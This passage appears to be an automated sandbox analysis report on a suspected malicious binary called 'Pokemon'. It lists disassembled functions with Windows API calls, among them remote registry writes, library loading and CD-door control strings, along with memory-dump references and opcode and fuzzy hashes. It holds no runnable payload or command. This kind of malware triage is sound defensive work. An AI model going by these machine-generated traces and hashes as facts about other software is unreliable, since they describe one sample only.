                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F18DA
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F18E1
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 000F18ED
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F18F4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: GetProcessHeap.KERNEL32(00000008,000F14FD,?,00000000,?,000F14FD,?), ref: 000F1AED
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,000F14FD,?), ref: 000F1AF4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,000F14FD,?), ref: 000F1B03
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cc600d20d456e53685915a2b7696065dc859555b16f446a253044e90f2015144
                                                                                                                                                                                                                                                                                      • Instruction ID: a73054521ed710ce79e438cdb7b339a3ff70571534a424bd0650b52f89c4c701
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc600d20d456e53685915a2b7696065dc859555b16f446a253044e90f2015144
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39715BB2D00209FBDB20DFA4ED49FEEBBB8AF04740F144125FA15A6590DB349A56DB60
                                                                                                                                                                                                                                                                                      Function 0011CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011CF1D
                                                                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0012DCD0,00000000,?,00000000,?,?), ref: 0011CFA4
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0011D004
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0011D054
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0011D0CF
                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0011D112
                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0011D221
                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0011D2AD
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0011D2E1
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0011D2EE
                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0011D3C0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                      • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                      • Opcode ID: 3b82302bc5298645c7754073c74a4eecb7166d050f4e930c48f07714c40a21a0
                                                                                                                                                                                                                                                                                      • Instruction ID: 628d364de9b33eba38ed9b8c848b64ad59a5af71cb4ad5d95be0218cd3ec7f55
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b82302bc5298645c7754073c74a4eecb7166d050f4e930c48f07714c40a21a0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3125D356046019FDB18DF14D891BAAB7E5FF88714F14886CF89A9B3A2CB31ED41DB81
                                                                                                                                                                                                                                                                                      Function 001213BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00121462
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0012149D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001214F0
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00121526
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001215A2
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0012161D
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AFD52: _wcslen.LIBCMT ref: 000AFD5D
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000F3547
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                      • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                      • Opcode ID: c70e8d644f971135dff625703ae96058fb145562eddeb0fbc97b50d56033d61a
                                                                                                                                                                                                                                                                                      • Instruction ID: f1e7a1745621c80555653f4d23bc39060f503620284c097f471dec1b28a1f180
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c70e8d644f971135dff625703ae96058fb145562eddeb0fbc97b50d56033d61a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EE1E131604351DFCB04EF24D4508AAB7E2FFA5314B14896CF896AB3A2DB30ED55CB81
                                                                                                                                                                                                                                                                                      Function 0011D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                      • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                      • Opcode ID: 999770718009e7a54e761fdbf90a29f0f642084732fa9fab1348751e52573f7c
                                                                                                                                                                                                                                                                                      • Instruction ID: 62af04adbaa23bb887490153c7e69704ff5714a684d3882af874b8b56f82507d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 999770718009e7a54e761fdbf90a29f0f642084732fa9fab1348751e52573f7c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 067117326005268BCB189F7CEA415FB33A2AB64754B220134FC66AB695FB35DDC4C3A0
                                                                                                                                                                                                                                                                                      Function 00128D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00128DB5
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00128DC9
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00128DEC
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00128E0F
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00128E4D
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00126691), ref: 00128EA9
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00128EE2
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00128F25
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00128F5C
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00128F68
                                                                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00128F78
                                                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,00126691), ref: 00128F87
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00128FA4
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00128FB0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                      • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                      • Opcode ID: b15190a2059965701922631552e51189c78c4c11d8ddfaf5af2b246c04de3ffa
                                                                                                                                                                                                                                                                                      • Instruction ID: a5d7aea7af086dff4d8cad554e41fa3b02ebb03486dba8d4e1226656e4510379
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b15190a2059965701922631552e51189c78c4c11d8ddfaf5af2b246c04de3ffa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9461D271900225FEEB24DF64EC45BFE77A8BF08B11F104116F915E61D2DBB49AA0CBA0
                                                                                                                                                                                                                                                                                      Function 001048BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0010493D
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00104948
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0010499F
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001049DD
                                                                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00104A1B
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00104A63
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00104A9E
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00104ACC
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                      • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                      • Opcode ID: b31d23d861c66b82f43cd63fb37a9e46f8aaef5e062e393133eb0ef30eca02ec
                                                                                                                                                                                                                                                                                      • Instruction ID: a0e964bbf2cc8d18c6e566e5872420874c661b1ecbe6a3dfb0c1287a72ad7992
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b31d23d861c66b82f43cd63fb37a9e46f8aaef5e062e393133eb0ef30eca02ec
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51710772604202DFC710EF24D8819ABB7E4EF58758F00492DF9D6972A2EB71DD45CB91
                                                                                                                                                                                                                                                                                      Function 000F6382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 000F6395
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000F63A7
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 000F63BE
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 000F63D3
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 000F63D9
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 000F63E9
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 000F63EF
                                                                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000F6410
                                                                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000F642A
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000F6433
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000F649A
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 000F64D6
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000F64DC
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 000F64E3
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 000F653A
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 000F6547
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 000F656C
                                                                                                                                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000F6596
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 011c47e17f798f29d99c422a407b95de59b611146eed242e4701cb05ba87436f
                                                                                                                                                                                                                                                                                      • Instruction ID: d9b3945e86393fd1a329751808a04db489f226c69097b424513b54882b68e044
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 011c47e17f798f29d99c422a407b95de59b611146eed242e4701cb05ba87436f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66718E31900709AFDB20DFA8DE45AAEBBF5FF48704F100518E686A2AA0D776F954DB50
                                                                                                                                                                                                                                                                                      Function 0011086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00110884
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0011088F
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0011089A
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 001108A5
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 001108B0
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 001108BB
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 001108C6
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 001108D1
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 001108DC
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 001108E7
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 001108F2
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 001108FD
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00110908
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00110913
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0011091E
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00110929
                                                                                                                                                                                                                                                                                      • GetCursorInfo.USER32(?), ref: 00110939
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0011097B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e7c8f1f8ccda0dde86e8aca586de06907c852f3b12d5b0a25d55a78eea9f3186
                                                                                                                                                                                                                                                                                      • Instruction ID: d07b07d71495efaac08e25befbe244c3bea6d73a1ba8340f644d652a3a0c90d0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7c8f1f8ccda0dde86e8aca586de06907c852f3b12d5b0a25d55a78eea9f3186
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 984145B0D083196ADB10DFB6CC8585EBFE8FF08754B50452AE11CE7291DB789941CF91
                                                                                                                                                                                                                                                                                      Function 000B0436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000B0436
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0016170C,00000FA0,DE3AC320,?,?,?,?,000D2733,000000FF), ref: 000B048C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000D2733,000000FF), ref: 000B0497
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000D2733,000000FF), ref: 000B04A8
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000B04BE
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000B04CC
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000B04DA
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000B0505
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000B0510
                                                                                                                                                                                                                                                                                      • ___scrt_fastfail.LIBCMT ref: 000B0457
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B0413: __onexit.LIBCMT ref: 000B0419
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 000B0492
                                                                                                                                                                                                                                                                                      • kernel32.dll, xrefs: 000B04A3
                                                                                                                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 000B04C4
                                                                                                                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 000B04D2
                                                                                                                                                                                                                                                                                      • InitializeConditionVariable, xrefs: 000B04B8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
